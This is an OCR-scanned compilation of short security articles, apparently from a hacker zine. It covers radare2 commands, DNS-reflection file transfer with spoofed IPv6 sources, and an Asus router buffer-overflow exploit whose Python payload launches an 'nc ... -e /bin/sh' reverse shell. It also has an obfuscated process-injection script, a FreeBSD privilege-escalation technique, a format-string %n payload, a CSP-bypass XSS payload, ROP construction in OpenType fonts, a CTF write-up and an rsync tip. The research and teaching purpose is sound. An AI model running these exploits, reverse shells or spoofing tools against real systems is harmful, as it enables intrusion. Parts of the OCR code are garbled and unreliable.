?v sym.imp.<func_name> 
?v reloc.<func_name> 


is 
iS~<permission> ; Tilde "greps" entries 


$ r2 -d <program> [<arg1>] 

$ r2 -d rarun2 program=<program> aslr=no [argi=<arg>] 
e dbg.forks = true 

Vv! 

dc,ds,dso 

dbt 


aaa ; Usually performed as first command 
pdf @ <func_name/address> ; At selects functions/addresses 
axt @ <func_name/address> 


"/ <string>" 
"Ix <bytes>" 
"/c <mnemonics>" 


pxr @ <register> ; Pretty print/Smart dereferences 
drr 


dm ; Needs to be in debug mode 
dmh 
dmm 


S$ ragg2 -P <length> -r 
wopO <pattern fragment> ; Similar to pattern_offset.rb 
wopO dr <instruction ptr name> ; Use after segfault 


/R <gadget> 

/RL <gadget> ; Similar to ropgadget.py 

e?rop 

e rop.len=<nr. of instructions including ret> 


rasm2 -a <arch> -b <bits> "<mnemonics>" 


$ 
S$ rasm2 -a <arch> -b <bits> -d <bytes> 
§ ragg2 -a <arch> -b <bits> -i exec 
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DNS Reflection 
done right 


Domain Name System is almost as old as the internet. 
Its specific architecture makes it a good abuse point for 
the attackers. In this short paper | will describe what is 
DNS Reflection, why malicious actors tend to use it and 
why you might want to use it. 


Let’s imagine a server behind a firewall that restricts the 
traffic only to Linux package repository and DNS servers. 
That means the packets sent from attacker’s computer 
will not reach victim server and vice versa. To send the 
packet to the server, we need to spoof the source 
address of the IP packet, so the firewall will “think” that 
the packet was sent from an allowed address. 


Why attackers reflect through DNS servers? Good 
reason is traffic amplification, which could further 
increase impact of the DoS attacks, by making use of 
fact that the DNS responses tend to be larger than DNS 
requests. The reflection is possible due to the fact that 
Domain Name System by default uses the UDP layer, 
which is connectionless. Another thing is that the DNS is 
probably the last protocol you would block in your 
firewall. 


Attacker Victim server 


Illustrated DNS Amplification attack (black arrows) 
Communication over DNS (blue and black arrows) 


Why you would use DNS Reflection? Assume that you 
want to communicate to the mentioned server, and you 
want a response back from it. A good example can be a 
remote shell ;). There is an easier and more common 
solution with creating your own DNS server, then 
communicating through fake queries. This is a good 
method, but | want to show you a way which does not 
require you to setup any network infrastructure. You 
just need to have IPv6 enabled to simplify things up, 
due to it’s direct connection nature (there is no NAT). 


https://github.com/srakai 
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This example Python code can be used to send a file to 
another computer, omitting a direct connection 
between these 2 machines. This is achieved by splitting 
it to 60 byte chunks (maximum length of a single 
domain) and using DNS Reflection technique to deliver 
packets. 

Use it for educational purposes only, in networks that 
you own. Don’t stress the DNS servers! Remember that 
this can piss off your internet provider, so use with 
caution. 


Sender code: 
#!/usr/bin/python3 

from kamene.all import * 
import base64, time, sys 


dnsaddr = "2620:119:35::35" # OpenDNS as an example 
send_delay = 0.8 


def send_packet(ip, packet_data): 
encoded_message = 
Gbase64.b64encode(packet_data.encode('ascii')) + b'-' 
encoded_message_size = len(encoded_message) 
for i in range(0, encoded_message_size, 60): 

data = encoded_message[i:i+60] 

DNSpacket = IPv6(dst=dnsaddr, 
Ssrc=ip)/UDP(sport=RandShort())/DNS(id=1337, rd=0, z=0, 
Stc=1, qd=DNSQR(qname=data, qtype="A", qclass="IN")) 

send(DNSpacket, verbose=0) 

time.sleep(send_delay) 


if len(sys.argv) < 3: 
print(f'{sys.argv[0]} receiver_ipv6_addr data_file’) 
sys.exit() 

send_packet(sys.argv|1], open(sys.argv[2]).read()) 


Receiver code: 

#!/usr/bin/python3 

import logging 
logging.getLogger("scapy.runtime").setLevel(logging. ERROR) 
from kamene.all import * 

import base64, sys 


def receive_packet(listen_iface): 
data = bytearray() 
while not b'-' in data: 
DNSPacket = sniff(iface=listen_iface, filter="src port 53", 
Scount=1) 
if ( DNSPacket[0].haslayer(DNS) ) and 
(DNSPacket[0].getlayer(DNS).id == 1337): 
data += (DNSPacket[0].getlayer(DNS).qd.qname|:-1]) 
print(base64.b64decode(data|:-1]).decode('ascii'), end="') 


if len(sys.argv) < 2: 
print(f'{sys.argv[0]} listen_interface') 
sys.exit() 

receive_packet(sys.argv[1]) 


External links: 
https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack, 
https://kamene.readthedocs.io/en/latest/introduction.html#about-sca 
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The Router Security Is 
Decadent and Depraved 


by Igor Chervatyuk 


There is nothing in the world more helpless and 
irresponsible and depraved than a man looking in the 
depths of a router security, and at some point last year 
my colleague and | jumped into that rotten stuff with 
moderate success. We found and reported three 
vulnerabilities to Asus for home-purpose wireless 
routers and one of them lead to remote code execution 
for unauthenticated attacker. Buy the ticket, take the 
ride, this is CVE-2018-8879'. 


The approach to look for vulnerabilities was as simple 
as possible, dumping names of all the available files in 
web-server directory and running through them in 
order to find out pages accessible from web without 
authentication. Among the other there was one, 
ironically, related to parental control and content 
filtering. Page was created in a way, that information 
printed on the screen are passed using URL parameters. 
There was three of them: mac, flag and cat_id. Shoving 
multiple "A's into one of them resulted with nothing. 
Except, according to the internal log, HTTPd daemon 
crashed and restarted each time | sent large malformed 
input, looking for a slight sign of malfunction. 


Attaching GDB to process showed that was really a 
classic textbook generic buffer overflow, except it had a 
lot of restrictions. URL parameters are parsed by means 
of web-server and, prior to overflow, mangled 
according to used parameter. For instance, ‘mac’ 
parameter expects string delimited with colons. Most 
promising parameter ‘flag’ was mangling input too. If 
we passed capital "A's to the parameter it would 
overwrite PC register with 0x61616160”. In addition to 
lower-casing characters, input is also being truncated. 


Using checksec shows that HTTPd daemon acts as a 
hardcore alcoholic with 30-years of experience in the 
field in the company of well-respectable sommeliers at 
wine degustation. All related libraries are compiled with 
full security precautions, when the HTTPd daemon has 
no RELRO, canary, PIE or FORTIFY whatsoever. 


Running ropper against target binary cheers us with lots 
of promising gadgets. 


1. Bug was found and exploited with immense help of Andrey Basarygin who 
listed as co-author of all three CVEs (other two are 2018-8877, 2018-8878) that 
probably never will be disclosed because I’m lazy and MITRE ignores my e-mails. 
On a serious note, vulnerability was discovered in Merlin firmware which is 
successor of Asus stock firmware and partially shares it code base. Supposedly, 
any model that has a firmware older than 384_20379 would be vulnerable. No 
information on 382_xxxx or the older 380_xxxx branches, but they are 
developed in parallel. 


2. AFAIK, ARM’s PC register aligns to power of 2, so last byte is being rounded. 
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riddle % ropper -I 0x00008000 -b 00 -f httpd 


® gadgets found 


Let's consider our options for a minute: 

1) No eavesdrop on stack addresses and searching for 
another vulnerability makes Johnny a dull boy’; 

2) No jumping to shell code for this overflow since non- 
executable stack is a thing for at least two hundred 
years. Flag restrictions and length of 500-something 
bytes prior to PC overwrite does not make things any 
easier; 

3) No ROP-chain since it requires multiple null-bytes. 


At this point one should start thinking where did life 
gone sideways, counting dubious life choices starting 
from high school and considering more accessible 
career of a village fool. However, no trick - no article. 


Turns out if we scroll the stack after the crash long 
enough we find HTTP-request headers. Each header is 
parsed by firmware separately and each header can end 
with its own fancy, shiny null-byte. This could be used 
as return address. Fortunately, there actually are some 
gadgets allows us to slightly adjust stack register and 
change PC to align with these headers! Header ROP- 
chain | guess? Here, have some exploit code’. 


/usr/bin/python 
import struct, urllib3 


# 00019294 add sp,sp,#0x800; pop {r4, r5, r6, r7, pc}; 


# 0003cea4 cpy r0,sp 
# 0003cea8 bl system 


cmd = 'nc 192.168.0.2 4444 -e /bin/sh' 

cmd = ';' + cmd + ';' 

align = "A" * 199 

payload = "A" * 532 

payload += struct.pack("<I", 0x00019294) 

url = "https://192.168.0.1:8443/blocking.asp" 
params = {'flag': payload} 

headers = { 

"Accept': 

('text/html, application/xhtml+xml, application/xml;' 
'q=0.9, image/webp, */*;q=0.8'), 

"Accept-Language': 'en-US,en;q=0.5', 
"Accept-Encoding': ‘gzip, deflate', 

"User-Agent': align + "VVVV" + "WWWW" + "XXXX" + 
"yyyy" + struct.pack("<I", @x0003cea4), 


"Connection': 'close', 
"Cookie': cmd + 'clickedItem_tab=0', 
"Upgrade-Insecure-Requests': '1'} 


http = urllib3.PoolManager ( ) 
r = http.request('GET', url, fields=params, 
headers=headers, ) 


3. | could probably leak some PLT address or something, but whatever. Who the 
hell do you think | am, Geohot? 


4. Tested on Merlin RT-AC68U_384.3_0. Stock firmware PC offset overwrite 
may vary, but AFAIK gadget addresses stays the same. Regular Asus firmware 
does not have netcat, so consider using ‘touch /tmp/home/root/1’ for PoC 
instead. 


ichervatyuk@gmail.com 
https://github.com/outofhere 
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PIDU - Process Injection and Dumping Utility 


#!/bin/bash 

# Process Injection and Dumping Utility, created by reenz@h years ago :) 

TW: @sektor7net 

README : 

Imagine you want to change a process running in a memory, but you don’t have gdb at 
hand. GNU/Linux is a flexible OS with (almost) everything-is-a-file philosophy. One of 
its cool features is procfs, giving the user access to processes’ kernel structures via 

a pseudo-filesystem. There are 2 files that expose both data and metadata of a process: 
/proc/<pid>/maps and /proc/<pid/>mem. The former contains memory layout with access 
permissions, the latter is a gateway to the process’ contents - its memory pages (see 
procfs(5)). 

You can leverage both maps and mem files to change any running process (keep in mind you 
need appropriate permissions to do that, see ptrace(2)). 

Here enter PIDU: a tool using only bash, procfs and dd to modify a process. It reads 
process layout exposed in maps and uses dd to read/write memory pages via the mem file. 
With PIDU you can dump the .text segment of a process, modify it on disk (ie. inject some 
shellcode with dd) and load it back to the original process. Of course you need to 

take process state changes into account while doing so. 

If you want to know how exactly the tool works, you will have to crack the obfuscation 

to find out. Or maybe not... GOOD LUCK! 

s=‘egrep -A30@ "4e.*z\)$" ${@}|tail +2|tr -d "\n"*;f=;c=;for ((1=0;i<${#s};i++));do [ $\ 
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Exploiting FreeBSD-SA-19:02.fd 


Karsten Konig of Secfault Security 
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FreeBSD 12.0 introduced a vulnerability in the handling 
of file descriptors!. The advisory stated that it would al- 
low to escalate privileges to root or to escape a FreeBSD 
jail. This note catches up on the general scenario that 
was created by this bug and introduces a novel tech- 
nique to delay writes in the FreeBSD kernel to create a 
TOCTOU-like exploit in order to escalate to root. 


Introduction 


2 The Bug Class 


Without going into the details, the scenario created by 
the kind of bugs as in the advisory shall be explained. 
The bug consisted of an overflow of the reference 
counter variable f_count in the C-struct struct file 
which is used to manage file operations. The variable is 
used to count file descriptors which reference the struct. 
If the attacker is able to wrap the counter back to 
1, while actually holding more than one file descriptor 
to the struct file object, this can lead to a user-after- 
free situation: By closing one descriptor after the wrap, 
the struct is freed by the kernel? while the other file 
descriptors still reference the freed struct on the heap. 
In the special case of FreeBSD, the struct is freed to 
the Files allocator zone?. Therefore, the bug only al- 
lows for dangling references to other objects in this zone. 
For example, by opening another file after the free () op- 
eration, an attacker could use the dangling file descrip- 
tors to write to the newly opened file (even though the 
descriptors previously pointed to a different file). 


3 Way to Exploitation 


Exploiting this for a privilege escalation was a bit tricky. 
It was not easily possible to turn this bug into a mem- 
ory corruption issue that could be exploited via ROP or 
other techniques in a way fail0verflow did for the PS4*. 
This is due to the fact that other as in the PS4 scenario, 
the f_data pointer of the struct file is not corrupted in 
this case. 

However, it is possible to start a write to a user-owned 
file, wait until after all required checks are performed 
and then exchange the file referenced by the used file 


lhttps://www. freebsd. org/security/advisories/ 
FreeBSD-SA-19:02.fd.asc 

*https: //ruxcon.org.au/assets/2016/slides/ 
ruxcon2016-Vitaly.pdf 
Shttp://phrack.org/issues/66/8.html 
4nttps://fail0verflow.com/blog/2017/ 
ps4-namedobj-exploit/ 
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descriptor with another file the user should not be able 
to write to. °. 

If a file is opened writable, a flag in the struct file 
is set to indicate this. This is only possible if the user 
has the correct access privileges for the file. The write() 
syscall will only check this flag to assert that the file 
referenced by the descriptor is writable. 

After performing this check, the syscall will eventually 
call the function bwillwrite () before the actual write op- 
eration happens on the file system. bwillwrite() will 
put the kernel to sleep without timeout if there are 
too many dirty-that is unwritten—buffers. This cre- 
ates a TOCTOU-like race condition if the attacker is 
able to exchange the struct file during this sleep be- 
cause the kernel will not check again if the file is opened 
writable. The use-after-free primitive introduced by the 
mentioned vulnerability makes this possible. 

Therefore any file, even if the attacker is only able to 
open it read-only, will be written to in this scenario. 

To trigger the sleep in the kernel, a lot of file streams 
are opened via fopen() in multiple processes with multi- 
ple threads. After each call to fopen(), the correspond- 
ing file is unlinked. When all streams are open, a signal 
is given to start a write to these in parallel. This will 
create a lot of dirty buffers really fast. 

If the write to an attacker-writable file happens at 
that moment, bwillwrite() will delay the write opera- 
tion. This renders the race condition exploitable com- 
bined with a use-after-free for struct file objects. For 
example, the user could trigger the bug and open the 
read-only file libmap.conf to gain root like kcope did 
in 2005°. 


4 Conclusion & Challenges 


This concludes the note. It appeals elegant that a way 
was found to exploit use-after-free bugs for struct file 
objects in FreeBSD in general. 

However, the most urgent challenge is to create a more 
universal exploit as the delay technique only works with 
UFS at the moment but ZFS is nowadays widely adopted 
on FreeBSD installations. 

A more detailed write-up for the interested reader and 
a full exploit for the advisory is available’. 

If you want to get in touch, feel free: @gr4yf0x at 
Twitter or karsten@secfault-security.com. 


5Jann Horn used a similar approach in 2016 https://bugs. 
chromium. org/p/project-zero/issues/detail?id=808 
Shttps://www.exploit-db.com/exploits/1230 

“https: //secfault-security.com/blog/FreeBSD-SA-1902.fd. 
html 
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Semantic gap 


by Honorary_BoT 


The other day | was walking. Walking page tables of 
course. On Windows. On Intel x64 CPU. 


Every time | try to exploit something, | avoid using 
known gadgets or techniques. Instead, | prefer 
getting to know the execution environment, like 
what is there in the address space, which properties 
it has and so on. | am also lazy, so | look for the 
easiest way possible. 


| needed an RWX memory in the kernel. | was aware 
that Microsoft does a really good job with 
mitigations and was not expecting any. But anyway, 
| decided to scan Windows page tables. 


| was not using any specifics of the Windows 
memory manager, | skipped Software PTEs. My idea 
was doing it in a hardware way: if the page has a P 
bit set in PTE, then the mapping is there, no matter 
what semantics Windows puts on that memory. 


| used PulseDbg, a hypervisor-based debugger for 
that. This way ensures the OS to be frozen and not 
modifying the page tables on the fly. For the 
scanning process itself refer to the Offzone 2019 
presentation “(Mis)configuring page tables”? or, 
even better, to the Intel Software Developers 
Manual (Vol 3, Chapter 4), it has all the details. In 
fact, SDM has everything, so always refer it. | also 
would suggest for you to read it before you go to 
bed. 


Surprise! Windows kernel does have RWX regions 
of memory. In my case it was Windows 10 1809. 
And an Intel Haswell CPU on a Gigabyte Q87 chipset 
motherboard, let me explain why it matters. 


The first thing | identified was an area with UEFI 
Runtime services being mapped as RWX. It is 
because the firmware typically doesn’t set the 
protection on loaded modules. And Windows is not 
aware of the semantics of the firmware loader. The 
only option for the OS is to rely on the firmware for 
those services to work. 


Semantic gap 


HAL keeps UEFI Runtime function pointer table at 
hal! HalEfiRuntimeServicesBlock. 
Those functions can be triggered from user mode, 
for instance by launching “System information”, 
which would trigger reading a UEFI variable. 


The good news is if you use Microsoft Surface 
devices, you’re fine, since MSFT firmware assigns 
protection to UEFI modules. Good job, Microsoft! 


Besides that, some drivers create custom 
allocations as RWX, which is inevitable, | guess. But 
not for MmMaploSpace function, which has an 
interesting behavior. Check out the prototypes: 


PVOID MmMapToSpace (PHYSICAL ADDRESS 
PhysicalAddress, SIZE T NumberOfBytes, 
MEMORY _ CACHING TYPE CacheType) ; 


PVOID MmMapToSpaceEx (PHYSICAL ADDRESS 
PhysicalAddress, SIZE T NumberOfBytes, 
ULONG Protect) ; 


The first one is a legacy one, the “Ex” one is only 
available on Windows 10. Third party drivers would 
use the old one. There is an implicit mapping 
between specified caching type and protection: 


e MmNonCached converted to RWX 
e MmCached converted to RWX 
e MmWriteCombined converted to RW 


So, the driver must decide if it wants backward 
compatibility, or a fine-grained protection of the 
mapping. 


The good news again is there is a Virtualization- 
Based Security. Virtual secure mode uses hardware 
virtualization features for security and protection of 
Windows 10. It has a WX enforcement in EPT — 
extended page tables, controlled by the hypervisor. 
It does not allow guest kernel memory to be both 
writable and executable at the same time. If you’re 
concerned about your Windows security, you 
should definitely turn VBS on. 


There are more RWX regions present in the kernel. 
If you’re interested, then take a walk. On page 
tables, of course. 


1. https://offzone.moscow/report/mis-configuring-page-tables/ 


Twitter: @honorary_bot 
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Using Binary Ninja to find format string vulns in Binary Ninja 


Using Binary Ninja to find format 
string vulns in Binary Ninja 


1 Motivation 


While targeting a bug bounty program, my fuzzer 
found a format string vulnerability. 

You mean you found a format string vuln 
in 2019? YUP! 

Surely not exploitable right? Aaahhhh, 
it was! The binary wasn’t compiled with FOR- 
TIFY_SOURCE or PIE, and even though it was 
a one-shot exploit, with some tricks I was able to 
get quite a reliable exploit (~90% reliability). Un- 
fortunately I’m not able to share more details yet. 

After this finding, I wanted to look for similar 
vulnerabilities, and so I decided to create a plugin 
in Binary Ninja to find format string vulns stati- 
cally. 


2 How it works 


The main idea behind the plugin is that the for- 
mat argument has to be a constant and read- 
only address. Cases like printf("Hello %s") fall 
in this category (the string comes from the .rodata 
section), but others such as printf (user_input) 
don’t, because the format argument comes from a 
stack or heap variable. 

To start, we load all known printf-like func- 
tions, functions that have a format ar- 
gument, and the index of this argument (e.g: 
printf->arg0, sprintf->argl, ...). 


Le., 


Secondly we iterate over the xrefs of all the printf 
like functions, to determine if the format argu- 
ment comes from a safe origin or not. Using Bi- 
nary Ninja’s medium level intermediate language 
(MLIL) in SSA form, we create a backwards slice, 
starting from the format argument and tracing all 
the way back to its origin(s) in the current function 
(no inter-procedural analysis). 

1. If the origin is an argument, we add this 
function to the printf-like functions list for further 
analysis. For example: 


void PRINTF_LIKE_1(char *fmt, 
va_list args; 
va_start(args, fmt); 
printf (fmt, args); 
va_end (args) ; 


re a! 


jofra 
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It is very important that we find these custom 
printf-like functions, because the compiler won’t 
output a warning when calling them without a 
string literal (as would be the case for known func- 
tions like printf), making them more likely to be 
vulnerable. 

2. If the origin is a constant and read-only 
address, we mark the call as safe. 

3. If the origin is the result of a known 
safe function call we also mark the call as 
safe. In this list we have all functions from 
the gettext family, which attempt to translate a 
text string into the user’s native language. If we 
were able to control the translation files (located 
in /usr/share/locale/<lang>/LC_MESSAGES), we 
would be able to trigger format strings, however 
these files are owned by root, and so we consider 
these to be safe. 

4. For any other origin we mark the call as 
vulnerable. 


3 Fun fact 


So, just before releasing the plugin I decided to run 
it against Binary Ninja itself and to my surprise it 
actually found a vulnerability. 

Whenever a plugin failed to load, an error 
message was displayed. This message was built 
as the concatenation of “Failed to enable plu- 
gin:\n”, PLUGIN NAME and ”\nCheck the 
log for more details” and passed to the func- 
tion BinaryNinja::LogAlert, a printflike func- 
tion. Since the plugin name was being used in a 
format argument, the code was vulnerable to a for- 
mat string vulnerability. 

It was quite funny that I was submitting a 
plugin to find format strings and the plugin name 
field was vulnerable to format strings, however 
there was no real impact, since plugins are man- 
ually accepted by the Binary Ninja’s team, and 
more importantly, the binary was compiled with 
FORTIFY_SOURCE, making format strings close 
to unexploitable. I also suspect a plugin named 
%115c%6$n%20%7$n%238cC%8S$n%5c%V9$n 
%247c%10$n%20%11$n%2540%12$n%15c% 
13$n%251c%14$n%5c%15$n%2520%16$n%2 
47c%17$n would raise a little suspicion. 


https://github.com/Vasco-jofra/format-string-finder-binja 
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Injecting HTML: Beyond XSS 


Lets take a look at this example web app: 


<html> 
<meta http—equiv="Content—Security—Policy" 
content="script—src 'nonce—...' 'unsafe—eval'" > 
<div id="template_target"></div> 


<script type="application/template" id="template" > 
Hello World! 1 + 1 = {{ 1+ 1 }} 
</script> 


Your search is <?php echo $_ GET|'q'|; ?> 


<script nonce="..."> 
let template = document.getElementBylId('template'); 
template_target.innerHTML = template.innerText.replace(/{{(.*)}}/g,eval) 
</script> 
</html> 


This functionality mirrors some of what you may see in modern templated web apps. Some privileged template 
is stored on the page, then its content is processed and turned into HTML. In this case it will read the content of 
the HTML element with id "template", executes anything within the {{ mustache }} brackets, and then renders 
the result in a separate element. 

The second feature of this app is to print a URL parameter on the page. This introduces a vulnerability that 
would normally lead to XSS due to injected HTML tags. However the presence of the Content-Security-Policy 
prevents an attacker from executing JavaScript. Since we cannot run JavaScript directly, lets see what other 
strange things can be accomplished. Potentially we may want to force the page to run our own template, since 
this would allow us to use the eval function. 

It might be tempting to try and provide our own element with id="template". However HTML ids are unique, 
so document. getElementById(’template’) will only select the first element and not our injected one. 

So what do we do? Turns out browsers are often very inconsistent, so it is always better to check our assump- 
tions. Lets try every tag just to be sure. Here we have a jinja2 page that will render a set of tags: 


<div id="template">First Tag</div> 
{% for tag in tag_ list %} 
<{{tag}} id="template">{{tag}}</{{tag}}> 
{% endfor %} 
<script >console.log(document.getElementBylId('template'));</script> 


When we run this we get a strange outcome: the selected tag is an <html> tag and not the original <div>. 
This <html> seems to have changed what element the id "template" references. Lets take a look at the HTML 
elements in the DOM before and after injecting <html id="template">: 


DOM After Parsing 


<html id="template"> 
Raw HTML Source Before Parsing <head> </head> 
<div id="template"></div> <body> 
<html id="template"></html> <div id="template"></div> 
</body> 
</html> 


It appears that the injected <html> tag has been moved to the top of the page. (This trick even works in 
all major browsers!) Now getElementById(’template’) will reference our injected data rather than the original 
element. At this point we can run our own templates and easily get JavaScript code execution: 


?q=<html id="template">{{ alert("xss") }}</html> 


So due to a browser quirk we managed to bypass the CSP and achieve XSS$! Try it out on this challenge. 
Thttp:/ /xss.stackchk. fail / 


https://twitter.com/itszn13 Amy Burnett 
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Building ROP with 
floats and OpenType 


by Mateusz Jurczyk (j00ru) 


Background 


The Adobe Font Development Kit for OpenType is a font 
processing engine dating back to at least 2000. It is 
written in C, and was open-sourced by Adobe in 2014 
on GitHub!. It became an attack surface when parts of 
AFDKO were included in Microsoft Direct Write starting 
with Windows 10 1709, to facilitate the printing of so- 
called variable fonts (e.g. in web browsers). 

This year, I reported a number of bugs in the library, 
with the 10 most severe ones being fixed by Microsoft 
in the July 2019 Patch Tuesday”. Many of them were 
convenient for exploitation, due to the software stor- 
ing the CharString execution context in a giant t2cCtx 
structure on the stack. Some of the primitives allowed 
controlled out-of-bounds writes, making it possible to 
skip the /GS cookie and overwrite the return address di- 
rectly. Furthermore, we could perform arbitrary arith- 
metic operations such as multiplication or division in 
the OpenType “virtual machine”. The only problem 
was — all calculations were performed on 32-bit floats 
(afdko/c/public/lib/source/t2cstr /t2cstr.c): 


struct /* Operand stack */ 


{ 
long cnt; 
float array [CFF2_MAX_OP_STACK] ; 
Eaxoeh 

} stack; 


Moreover, data could be pushed on the stack by op- 
code 255, which loads a 32-bit integer from the Open- 
Type program stream and converts it from an assumed 
16.16 fixed point value to a float: 


long value; 
CHKSUBRBYTE (h) ; 
value = *next++; 
CHKSUBRBYTE (h) ; 
value = value << 8 | *next++; 
Lowel 

PUSH(value / 65536.0); 


The most basic element of a ROP chain are constant 
values, e.g. fixed function arguments. The question is 
— how to construct a float with a given binary represen- 
tation, provided the above capabilities? Let’s recap the 
format of IREE-754 single precision numbers: 


31 0 


Exponent (8 bits) | Mantissa (23 bits) 
(golateine (( | 


Sign (1 bit) ; 


Thttps://github.com/adobe-type-tools/afdko 
*https://twitter.com/j00ru/status/1148883124463505408 


Mateusz Jurezyk 


SAA-ALL 0.0.5 


Zero, infinity and NaN 


Binary zero is the same as a floating point 0.0, while 
0x80000000 can be created by negating it. Infinity is 
represented by exponent = 128 (let’s call it e, calculated 
as the encoded e minus 127) and mantissa = 0 (m in 
short), which corresponds to 0x7£800000 for inf and 
0xff£800000 for -inf. They can be created with a simple 
expression: 


Olr 


Basic quiet NaN, which has the values of 0x7£c00000 
and Oxffc00000 (e = 128, m = 2”, sign controlled), is 
generated similarly: 


All other NaNs between 0x7f£800001-0x7fffffff 
and Oxff800001-Oxffffffff cannot be generated us- 
ing floating point arithmetic. One has to accept it when 
crafting a ROP chain in the AFDKO environment. 


Real numbers 


Encoding most values in the 32-bit integer range can 
be achieved as follows. The first number pushed on 
the stack is used to set up the sign bit and 23 bits of 
mantissa. For OxdeadcOde, we’d use —22240.43359375 
(OxA91F’9100 as Fixed16.16), which is represented as 
Oxc6adcOde in binary. At this point, the only innacu- 
rate part is the exponent, currently equal to 14 (encoded 
as 144 127 = 141), with an intended value of 62. It can 
be manipulated by multiplying and dividing the value 
by 2”, for 0 <n < 14 in our case, because of the 16.16 
encoding and one bit reserved for sign. In summary, the 
OxdeadcOde dword can be constructed by implementing 
the following expression in an OpenType charstring: 


—22240.43359375 « (2'*)? « 2° 


The above scheme works for all canonical numbers, 
i.e. floating points with exponent 4 —127 (0x00800000- 
Ox7f7fffff and 0x80800000-0xff7fffff). The only 
other corner case to consider are denormalized numbers 
(when e = —127). They are smaller than normal num- 
bers, and are interpreted differently in that they don’t 
have an implicit leading 1. Instead of adding extra logic 
to handle them in my converter, I decided to “cheat” 
and solve the problem for a bigger value: 


14 
2 * Lachormal) 


gi4 


Convert ( 


Convert(Xdenormal) = 


After a maximum of two recursive calls, the argument 
becomes a normal number and can be handled using the 
regular logic described above. 

The converter is available on GitHub?, and produces 
charstrings accepted by the Font Tools ttx (de)compiler’. 
Happy hacking! 


3https://j00ru.vexillium.org /int_to_float_opentype 
“https: //github.com/fonttools/fonttools 
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—  Sec/Hack ig Scrambled: Rubik's Cube based steganography 


Scrambled: Rubik's Cube based 
steganography (from UTCTF 19) 


Step 0: Write some helper methods 


import math, random 
MUS: 2 AARC Mie) SRST Me RCM es 


Disclaimer: | wrote this problem for UT CTF, but | did not come up Br CiDiew RZ pea bows UD eS (BO ees D2u) i 
with the idea (I’m not that smart). This entire system was proposed in Be Os TEN ie ZR ay, FUN Oa SRC TIDE 
the paper ‘Rubikstega: A Novel Noiseless Steganography Method in WOME Ss SILER, MEP eGls, Minhtals Met eal, SUMeAn Tike Bak, 
Rubik’s Cube’, and | just implemented it. “Do si) R27 335, sR204,, WUE a SB2ei5S) “D205. 
STN CNS Cac. UN UR US oF ci aa 
Prompt shuffleNums = dict() 
# Convert a base 9 number to a string 
B2URAUSE Re SEB B2SE FAD) Die RE E25 DE SRAR D2 Be SEAR def nineToStr(nine): 
1 BME2 R252 RY IF Be RDS D! Fu2 Bo UU De U2 return decToStr(int(str(nine), 9)) 
feo # Convert a decimal number to a string 


def decToStr(dec): 
return bytes.fromhex(hex(dec).replace('L', 
"")[2:]).decode('utf-8') 
# Convert scramble notation to base 9 
def scrambleToNine(scramble, dict): 


EES SE2SRABSRGRGE2ZSE OT R2 DE UT US Ue USES DEEZ UR: 
UETESURB2 5 BAU2 SDB SE2 I D2 TE 2S PUB es re Dawes DaU2tU2 aD 2, 
USBESESDER2TU2 IRE Ba E2N DER DEB- SUB DEBE SEs Ue TRIS Ue 
EI U2SE2TROR EE 2S BI AE BeBe DER IRS UGE 


Haves iu if dict: result = 
"" join(str(shuffleNums[moves[move]]) for move in 
Solution scramble.split()) 


Sj | deat bl r : h littl d else: result = ''.join(str(moves[move]) for move in 
ince | made the problem, I'm going to cheat a little an scramble.split()) 


use my God-like problem-writer powers to determine retunnuresuilt 
that the problem has to do with Rubikstega (for those 
not so clairvoyantly inclined, 'Rubikstega' was released 
as a hint later on in the CTF). Rubikstega is a 
steganography system that used Rubik's cube scramble 
notation to encode the data. There are 18 notations for 


Step 1: Decode the permutation header 


def decodePerm(head) : 
decoded = str(int(str(scrambleToNine(head, @)), 9)) 
shuffle = list(decoded[int(decoded[@]) +1: 


Rubik’s Cube scrambles, but in Rubikstega they’re int(decoded[@]) + 1 + 9]) 
grouped into 9 pairs. There’s a default encoding table for key in shuffle: shuffleNums[int(key)] = 
that maps the numbers 0-8 to a pair of notations, and shuffle. index(key) 


one of the notations from the pair is randomly chosen to 
represent that number. To encode a message, you first Step 2: Decode the length information 
generate a permutation of the default encoding table, 


F : : . : ; def decodeLength(head) : 
with 0-8 now mapping to different notation pairs. This 


decoded = str(int(str(scrambleToNine(head, 1)), 9)) 


is encoded in the permutation header along with some return decoded[int(decoded[@]) + 2 : int(decoded[@]) 
random padding. To start encoding the message, you + 2 + int(decoded[1])] 

convert each character into its binary representation, 

then concatenate all of them into one large binary Step 3: Decode the message! 


string. Next you get convert that long binary string to 


def decode(cipher): 
base 9, and use the permuted encoding table to convert Se 


scrambles = cipher.split(',') 


the base 9 digits to scramble notation. Once the decodePerm(scrambles[0]) 
message is encoded, you make the length header by encoded = ''.join(scrambles[2:]) 
combining the length of the encoded message with decoded = nineToStr(str(scrambleToNine(encoded, 


1))[:int(decodeLength(scrambles[1]))]) 


more random padding. The final message is the 
return decoded 


permutation header, length header and finally the actual 

message. My explanation glossed over quite a few 

details, so if you're interested in the specifics you should Add in a main method to get input and call decode(), 

check the paper. Now, in order to decode, you just do pass in the 3 scrambles from the prompt, and we get 

those steps in reverse: the decoded message: 
utflag{my_braln_1s_scramb13d}! 


"http://informatika.stei.itb.ac.id/~rinaldi.munir/TA/Makalah_TA_ 
Ade_Yusuf.pdf 


github.com/alex-bellon/rubikstega Alex Bellon 
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Rsync - the new cp 


Rsync - the new cp 


1 Introduction 


For everyone who is still before or during their transition 
to fully automatic full-blown CI/CD pipelines, you may 
often find yourself copying lots of files, not only on a 
local machine, but also between servers. 

While for many simple use cases cp will be enough, 
you may often find yourself looking for some additional 
features that cp is not capable of. Not to look far, copy- 
ing to or from remote machines is a really common task 
which is beyond powers of cp. The next missing fea- 
ture is tracking copying progress which is useful while 
transferring large files. 

So what can we do with it? As you may have al- 
ready guessed there is a way to overcome these issues 
and rsync is our savior. As its manual! suggests it’s a 
fast and versatile file-copying tool. It allows us to syn- 
chronize files not only locally but also between remote 
machines. It has a lot of useful options, that should 
satisfy almost everyone. 


2 Setup 


We can install it simply by calling the following com- 
mand on ubuntu (or a similar command on other sys- 
tems). 


$ sudo apt—get install rsync 


Next we can modify our .bash_aliases file by adding 
the following line. In this example we are overriding the 
default copying method of our system, but if you wish 
to leave cp usable, just change the alias shown below to 
something, like cpr. 


alias cp="rsynce —ah —inplace 
——info=progress2” 


Listing 1: ”.bash_aliases” 


The last thing you have to do to use your new com- 
mand is restarting your terminal. Now you can try out 
if everything is working fine. Just copy a file and check 
if you can see the progress printed in your terminal. If 
so, you are done! 


3 Options 


In this section we will review some of the most popular 
rsync options. This will include ones we’ve used in our 
